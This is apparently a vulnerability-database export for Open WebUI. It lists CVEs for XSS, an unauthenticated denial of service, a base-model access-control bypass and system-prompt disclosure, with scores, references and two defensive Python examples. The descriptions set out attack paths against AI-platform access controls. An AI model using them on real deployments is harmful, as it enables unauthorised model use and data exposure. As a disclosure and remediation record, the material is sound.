value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-04T03:03:22Z/
url https://github.com/open-webui/open-webui/releases/tag/v0.8.11
fixed_packages
0
url pkg:pypi/open-webui@0.8.11
purl pkg:pypi/open-webui@0.8.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-8nzh-cpda-dkca
13
vulnerability VCID-8y4k-pj2n-8uhm
14
vulnerability VCID-chug-ma8r-cucc
15
vulnerability VCID-cw4k-3s8z-uqh8
16
vulnerability VCID-dz6g-jgmg-wqce
17
vulnerability VCID-dzh3-rqx4-fqhv
18
vulnerability VCID-ef1t-pxjm-j7cz
19
vulnerability VCID-hj5f-yk3y-ffdg
20
vulnerability VCID-jfs9-dps1-27a2
21
vulnerability VCID-n4ma-zcpv-5fbp
22
vulnerability VCID-nxvm-97r4-6ybz
23
vulnerability VCID-pkds-1xgn-q3bv
24
vulnerability VCID-q682-k826-efhv
25
vulnerability VCID-qgfh-7u8n-y7c7
26
vulnerability VCID-qjt1-zxx8-r7ht
27
vulnerability VCID-r7vt-4bqm-f7hb
28
vulnerability VCID-reqw-pfm8-c7g5
29
vulnerability VCID-rhhj-rccv-87hw
30
vulnerability VCID-s625-eg1w-gfd1
31
vulnerability VCID-t571-d65a-cyb2
32
vulnerability VCID-vghe-uuzj-m7cu
33
vulnerability VCID-vkx3-71kv-sugt
34
vulnerability VCID-w2vd-r3hr-w3bt
35
vulnerability VCID-wcz4-vwx4-tufb
36
vulnerability VCID-yug9-shts-kufb
37
vulnerability VCID-yysb-dk2k-f7g4
38
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.11
aliases CVE-2026-34222, GHSA-7429-hxcv-268m
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-um53-kf7u-kkg6
59
url VCID-vghe-uuzj-m7cu
vulnerability_id VCID-vghe-uuzj-m7cu
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the AccountPending.svelte component renders the admin-configured "Pending User Overlay Content" using marked.parse() inside {@html} with an incorrect DOMPurify application order. An admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44568
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10105
published_at 2026-06-14T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10069
published_at 2026-06-11T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.1012
published_at 2026-06-13T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10115
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44568
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44568
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44568
3
reference_url https://github.com/advisories/GHSA-fq3v-xjjx-95rc
reference_id GHSA-fq3v-xjjx-95rc
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fq3v-xjjx-95rc
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc
reference_id GHSA-fq3v-xjjx-95rc
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T20:18:40Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44568, GHSA-fq3v-xjjx-95rc
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vghe-uuzj-m7cu
60
url VCID-vj38-mn12-v7br
vulnerability_id VCID-vj38-mn12-v7br
summary In version 0.3.32 of open-webui/open-webui, the `api/v1/utils/code/format` endpoint has no authentication, so any unauthenticated attacker can reach it. A POST request carrying an excessively large body can make the server completely unresponsive or severely degraded, resulting in service interruptions for legitimate users.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-12537
reference_id
reference_type
scores
0
value 0.02671
scoring_system epss
scoring_elements 0.86203
published_at 2026-06-13T12:55:00Z
1
value 0.02671
scoring_system epss
scoring_elements 0.86201
published_at 2026-06-14T12:55:00Z
2
value 0.02671
scoring_system epss
scoring_elements 0.86142
published_at 2026-06-11T12:55:00Z
3
value 0.02671
scoring_system epss
scoring_elements 0.86192
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-12537
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/blob/e8babe62bc8e466be0367703fd062a981f5c2394/src/lib/apis/utils/index.ts#L25-L56
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/blob/e8babe62bc8e466be0367703fd062a981f5c2394/src/lib/apis/utils/index.ts#L25-L56
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-12537
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-12537
4
reference_url https://huntr.com/bounties/edabd06c-acc0-428c-a481-271f333755bc
reference_id edabd06c-acc0-428c-a481-271f333755bc
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-20T14:28:33Z/
url https://huntr.com/bounties/edabd06c-acc0-428c-a481-271f333755bc
5
reference_url https://github.com/advisories/GHSA-chf7-q7m5-fq92
reference_id GHSA-chf7-q7m5-fq92
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-chf7-q7m5-fq92
fixed_packages
0
url pkg:pypi/open-webui@0.3.33.dev1
purl pkg:pypi/open-webui@0.3.33.dev1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-4rz6-hw32-jueb
9
vulnerability VCID-4sn4-mrbm-dfgh
10
vulnerability VCID-4v8w-kv6g-kkbc
11
vulnerability VCID-4x63-8x64-d3bq
12
vulnerability VCID-5319-t7jm-y3bx
13
vulnerability VCID-5jna-wvd7-j7cm
14
vulnerability VCID-5wfg-zqcy-c7ar
15
vulnerability VCID-5wzn-mfwg-ybc3
16
vulnerability VCID-66zh-9jk7-9bfx
17
vulnerability VCID-68jf-2utx-x7br
18
vulnerability VCID-6rbm-rm25-hqgy
19
vulnerability VCID-7j5a-pu4k-kucf
20
vulnerability VCID-7nbc-ng1s-suck
21
vulnerability VCID-8n6u-wgz9-1bgj
22
vulnerability VCID-8nzh-cpda-dkca
23
vulnerability VCID-8qvj-xndv-v3ay
24
vulnerability VCID-8y4k-pj2n-8uhm
25
vulnerability VCID-94nj-qkdf-xfhn
26
vulnerability VCID-9jud-sr2a-8yc3
27
vulnerability VCID-9zyk-459z-x3a4
28
vulnerability VCID-chug-ma8r-cucc
29
vulnerability VCID-cw4k-3s8z-uqh8
30
vulnerability VCID-dz6g-jgmg-wqce
31
vulnerability VCID-dzh3-rqx4-fqhv
32
vulnerability VCID-ef1t-pxjm-j7cz
33
vulnerability VCID-gw77-ux3j-qfaa
34
vulnerability VCID-hj5f-yk3y-ffdg
35
vulnerability VCID-jfs9-dps1-27a2
36
vulnerability VCID-jnsg-u9dy-r3d5
37
vulnerability VCID-k17g-bd9g-67f7
38
vulnerability VCID-k9jf-5jzd-pkge
39
vulnerability VCID-mn21-kwuu-w7by
40
vulnerability VCID-n4ma-zcpv-5fbp
41
vulnerability VCID-nxvm-97r4-6ybz
42
vulnerability VCID-pkds-1xgn-q3bv
43
vulnerability VCID-pvep-chj7-ekeg
44
vulnerability VCID-pwsg-72yy-quhk
45
vulnerability VCID-q682-k826-efhv
46
vulnerability VCID-qgfh-7u8n-y7c7
47
vulnerability VCID-qjt1-zxx8-r7ht
48
vulnerability VCID-r7vt-4bqm-f7hb
49
vulnerability VCID-reqw-pfm8-c7g5
50
vulnerability VCID-rhhj-rccv-87hw
51
vulnerability VCID-s625-eg1w-gfd1
52
vulnerability VCID-t571-d65a-cyb2
53
vulnerability VCID-tz2k-gazs-mqgd
54
vulnerability VCID-u25g-p4nx-gqd1
55
vulnerability VCID-ujye-g4rj-8be5
56
vulnerability VCID-um53-kf7u-kkg6
57
vulnerability VCID-vghe-uuzj-m7cu
58
vulnerability VCID-vkx3-71kv-sugt
59
vulnerability VCID-w2vd-r3hr-w3bt
60
vulnerability VCID-wb88-83cj-ffhy
61
vulnerability VCID-wcz4-vwx4-tufb
62
vulnerability VCID-yug9-shts-kufb
63
vulnerability VCID-yysb-dk2k-f7g4
64
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.33.dev1
aliases CVE-2024-12537, GHSA-chf7-q7m5-fq92
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vj38-mn12-v7br
61
url VCID-vkx3-71kv-sugt
vulnerability_id VCID-vkx3-71kv-sugt
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, Open WebUI supports model composition via base_model_id: a user-defined model (e.g., "Cheap Assistant") can reference an existing base model (e.g., "gpt-4-turbo-restricted") that provides the actual inference capability. When a user queries the composed model, the access control pipeline verifies the user has access to the composed model but never re-verifies access to the chained base model. Additionally, the model creation and import endpoints accept arbitrary base_model_id values without checking that the caller has access to that base model. Combined, this allows any user with the default model creation permission to create a model that chains to a restricted base model — and then invoke it, causing the server to dispatch the request to the restricted base model using the admin-configured API key. This vulnerability is fixed in 0.9.0.
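The chain described in VCID-vkx3-71kv-sugt (CVE-2026-44555) fails at two points: inference checks only the composed model, and creation/import accepts any base_model_id. Below is an added example, not Open WebUI's own code; the Model record, the access_control dict layout and the function names are assumptions. It resolves the base_model_id chain, requires access at every hop at both inference and creation time, and refuses cycles and over-long chains, which the summary does not mention but which any chain-following resolver has to handle.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Model:
    id: str
    user_id: str                            # creator
    base_model_id: Optional[str] = None     # inference is delegated to this model
    access_control: Optional[dict] = None   # None = readable by all users (assumed)


def has_access(user_id: str, is_admin: bool, access_control: Optional[dict], type: str = "read") -> bool:
    """Assumed layout: {"read": {"user_ids": [...]}, "write": {"user_ids": [...]}}."""
    if is_admin:
        return True
    if access_control is None:
        return type == "read"
    return user_id in access_control.get(type, {}).get("user_ids", [])


def resolve_chain(models: dict, model_id: str, max_depth: int = 8) -> list:
    """Follow base_model_id links to the model that actually serves the
    request. Cycles and over-long chains are refused rather than looped."""
    chain, seen, cur = [], set(), model_id
    while cur is not None:
        if cur in seen or len(chain) >= max_depth:
            raise ValueError(f"base_model_id cycle or chain too long at {cur}")
        m = models.get(cur)
        if m is None:
            raise KeyError(cur)
        chain.append(m)
        seen.add(cur)
        cur = m.base_model_id
    return chain


def vulnerable_authorize(models: dict, user_id: str, is_admin: bool, model_id: str) -> bool:
    """Pre-0.9.0 behaviour as described: only the composed model is checked."""
    return has_access(user_id, is_admin, models[model_id].access_control)


def authorize_inference(models: dict, user_id: str, is_admin: bool, model_id: str) -> bool:
    """Fixed: the caller needs read access to every hop, including the base."""
    return all(has_access(user_id, is_admin, m.access_control)
               for m in resolve_chain(models, model_id))


def create_model(models: dict, user_id: str, is_admin: bool, new: Model) -> None:
    """Creation/import path: refuse a base_model_id the caller cannot use themselves."""
    if new.base_model_id is not None and not authorize_inference(models, user_id, is_admin, new.base_model_id):
        raise PermissionError(f"{user_id} may not chain to {new.base_model_id}")
    models[new.id] = new


def demo() -> dict:
    """Constructed registry: an admin-only base model, and a composed model that
    a regular user managed to save under the old, unchecked creation path."""
    models = {
        "gpt-4-turbo-restricted": Model("gpt-4-turbo-restricted", "admin",
                                        access_control={"read": {"user_ids": ["admin"]}}),
    }
    cheap = Model("cheap-assistant", "mallory", base_model_id="gpt-4-turbo-restricted")
    models_old = dict(models, **{cheap.id: cheap})      # saved without any check

    try:
        create_model(models, "mallory", False, cheap)
        creation_blocked = False
    except PermissionError:
        creation_blocked = True

    loop = {"a": Model("a", "u", base_model_id="b"), "b": Model("b", "u", base_model_id="a")}
    try:
        resolve_chain(loop, "a")
        cycle_rejected = False
    except ValueError:
        cycle_rejected = True

    return {
        "creation_blocked": creation_blocked,
        "vulnerable_allows": vulnerable_authorize(models_old, "mallory", False, "cheap-assistant"),
        "fixed_allows": authorize_inference(models_old, "mallory", False, "cheap-assistant"),
        "admin_allows": authorize_inference(models_old, "admin", True, "cheap-assistant"),
        "cycle_rejected": cycle_rejected,
    }


if __name__ == "__main__":
    print(demo())
```

Checking at creation time alone is not enough: a base model can be restricted after a composed model already references it, which is why the inference path re-walks the chain on every request rather than trusting the stored reference.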
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44555
reference_id
reference_type
scores
0
value 0.00045
scoring_system epss
scoring_elements 0.1431
published_at 2026-06-14T12:55:00Z
1
value 0.00045
scoring_system epss
scoring_elements 0.14217
published_at 2026-06-11T12:55:00Z
2
value 0.00045
scoring_system epss
scoring_elements 0.14336
published_at 2026-06-13T12:55:00Z
3
value 0.00045
scoring_system epss
scoring_elements 0.14337
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44555
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44555
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44555
3
reference_url https://github.com/advisories/GHSA-9vvh-qmjx-p4q8
reference_id GHSA-9vvh-qmjx-p4q8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9vvh-qmjx-p4q8
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-9vvh-qmjx-p4q8
reference_id GHSA-9vvh-qmjx-p4q8
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T20:21:00Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-9vvh-qmjx-p4q8
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44555, GHSA-9vvh-qmjx-p4q8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vkx3-71kv-sugt
62
url VCID-w2vd-r3hr-w3bt
vulnerability_id VCID-w2vd-r3hr-w3bt
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a stored cross-site scripting (XSS) vulnerability allows any authenticated user with model creation permission (workspace.models) to execute arbitrary JavaScript in the browser of any other user (including admins) who views the malicious model in the chat UI. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44721
reference_id
reference_type
scores
0
value 0.00036
scoring_system epss
scoring_elements 0.11145
published_at 2026-06-12T12:55:00Z
1
value 0.00036
scoring_system epss
scoring_elements 0.11107
published_at 2026-06-14T12:55:00Z
2
value 0.00036
scoring_system epss
scoring_elements 0.11078
published_at 2026-06-11T12:55:00Z
3
value 0.00036
scoring_system epss
scoring_elements 0.11139
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44721
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44721
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44721
3
reference_url https://github.com/advisories/GHSA-gf5m-wcrh-7928
reference_id GHSA-gf5m-wcrh-7928
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gf5m-wcrh-7928
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-gf5m-wcrh-7928
reference_id GHSA-gf5m-wcrh-7928
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-19T12:37:29Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-gf5m-wcrh-7928
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44721, GHSA-gf5m-wcrh-7928
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w2vd-r3hr-w3bt
63
url VCID-wb88-83cj-ffhy
vulnerability_id VCID-wb88-83cj-ffhy
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.9, when a regular (non-admin) user logs in, the application issues a request to http://IP:8080/api/models? and the response reveals the system prompts of the available models that the admin configured on the workspace Models page, affecting the confidentiality of the application. This vulnerability is fixed in 0.8.9.
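The disclosure in VCID-wb88-83cj-ffhy (CVE-2026-45351) is a response-shaping problem: the model record handed to a non-admin carries admin-only fields. The block below is an added example, not Open WebUI's own code; the record layout (system prompt under params.system), the allow-listed keys and the function names are assumptions. It serialises a model per role using an allow-list, so a newly added admin-only field is hidden by default rather than leaked by default, and includes a recursive leak finder that can be run over a non-admin response as a regression check.

```python
import copy

# Fields a non-admin caller may see on a model record (assumed shape). An
# allow-list means unknown or newly added fields are hidden until reviewed.
USER_VISIBLE_KEYS = {"id", "name", "base_model_id", "meta"}
USER_VISIBLE_PARAMS = {"temperature", "max_tokens"}
SENSITIVE_KEYS = {"system"}          # the system prompt lives under params.system


def serialize_model(model: dict, role: str) -> dict:
    """Admins get the full record; everyone else gets the allow-listed view.
    Copies are returned so callers cannot mutate the stored record."""
    if role == "admin":
        return copy.deepcopy(model)
    out = {k: copy.deepcopy(v) for k, v in model.items() if k in USER_VISIBLE_KEYS}
    params = model.get("params") or {}
    out["params"] = {k: v for k, v in params.items() if k in USER_VISIBLE_PARAMS}
    return out


def serialize_models(models: list, role: str) -> list:
    return [serialize_model(m, role) for m in models]


def find_leaks(payload, sensitive=frozenset(SENSITIVE_KEYS), path: str = "") -> list:
    """Walk a response body and report the path of every sensitive key, however
    deeply nested. Run it over the non-admin /api/models body in a test."""
    leaks = []
    if isinstance(payload, dict):
        for k, v in payload.items():
            p = f"{path}.{k}" if path else k
            if k in sensitive:
                leaks.append(p)
            leaks.extend(find_leaks(v, sensitive, p))
    elif isinstance(payload, list):
        for i, v in enumerate(payload):
            leaks.extend(find_leaks(v, sensitive, f"{path}[{i}]"))
    return leaks


# Constructed sample record; the system prompt text is invented.
SAMPLE_MODELS = [
    {
        "id": "support-bot",
        "name": "Support Bot",
        "base_model_id": "llama3",
        "params": {"system": "You are the internal support bot. Never reveal ticket data.",
                   "temperature": 0.2},
        "meta": {"description": "Answers IT tickets"},
    }
]


def demo() -> dict:
    return {
        "admin_leaks": find_leaks(serialize_models(SAMPLE_MODELS, "admin")),
        "user_leaks": find_leaks(serialize_models(SAMPLE_MODELS, "user")),
        "user_view": serialize_models(SAMPLE_MODELS, "user"),
    }


if __name__ == "__main__":
    print(demo())
```

The admin view is expected to contain params.system; the point of find_leaks is that the non-admin view never does, and that the check keeps holding as fields are added to the record.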
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45351
reference_id
reference_type
scores
0
value 0.00038
scoring_system epss
scoring_elements 0.1183
published_at 2026-06-12T12:55:00Z
1
value 0.00038
scoring_system epss
scoring_elements 0.11803
published_at 2026-06-14T12:55:00Z
2
value 0.00038
scoring_system epss
scoring_elements 0.11744
published_at 2026-06-11T12:55:00Z
3
value 0.00038
scoring_system epss
scoring_elements 0.11826
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45351
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.9
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.9
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45351
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45351
4
reference_url https://github.com/advisories/GHSA-jh9g-8jqw-m2qx
reference_id GHSA-jh9g-8jqw-m2qx
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jh9g-8jqw-m2qx
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jh9g-8jqw-m2qx
reference_id GHSA-jh9g-8jqw-m2qx
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T19:39:16Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jh9g-8jqw-m2qx
fixed_packages
0
url pkg:pypi/open-webui@0.8.9
purl pkg:pypi/open-webui@0.8.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
